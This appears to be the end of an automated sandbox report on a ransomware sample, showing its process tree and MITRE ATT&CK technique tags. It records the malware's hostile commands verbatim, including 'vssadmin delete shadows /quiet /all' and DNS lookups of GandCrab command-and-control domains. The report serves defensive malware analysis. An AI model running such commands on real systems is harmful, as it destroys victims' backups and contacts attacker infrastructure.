                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              nslookup gandcrab.bit dns1.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                nslookup nomoreransom.coin dns1.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:996
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  nslookup nomoreransom.bit dns1.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4852
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    nslookup gandcrab.bit dns2.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00361\VHO-Trojan-Ransom.Win32.Blocker.gen-3e71c7978b347b083b97b0d14380576600507e2e9f7807ce6f7a8dafdad4bbe1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    VHO-Trojan-Ransom.Win32.Blocker.gen-3e71c7978b347b083b97b0d14380576600507e2e9f7807ce6f7a8dafdad4bbe1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      dw20.exe -x -s 408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4572
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 7DF3AD27F19FD4C48147CF24C929D7C0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\MsiExec.exe -Embedding DCDC0F430EB6A353DF29AD8C6CC05FA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "133399801216031201-147493349014578165835155292041638358000-127155838826300625"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cmd.exe /c vssadmin.exe delete shadows /quiet /all
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          vssadmin.exe delete shadows /quiet /all
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "-10444766091698327875-11503326141018378037368300830-1611623668-124991212625562444"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "-1258444727-788235808-559152050-2122983086818950372103064142615181853801060866594"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\PROGRA~2\MICROS~1\Office14\OUTLOOK.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\PROGRA~2\MICROS~1\Office14\OUTLOOK.EXE -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "966904153-1011408285-1196582715-6937493612107977374-17982595641642544864-1633894502"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    taskeng.exe {552F3E7E-B55B-41A4-92A6-28DA9637EA7C} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\AUDIODG.EXE 0x488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "LogonUI.exe" /flags:0x0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5312

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Reconnaissance

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Resource Development

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Initial Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1059

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Windows Management Instrumentation

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1047

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1547

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1547.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Winlogon Helper DLL

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1547.004

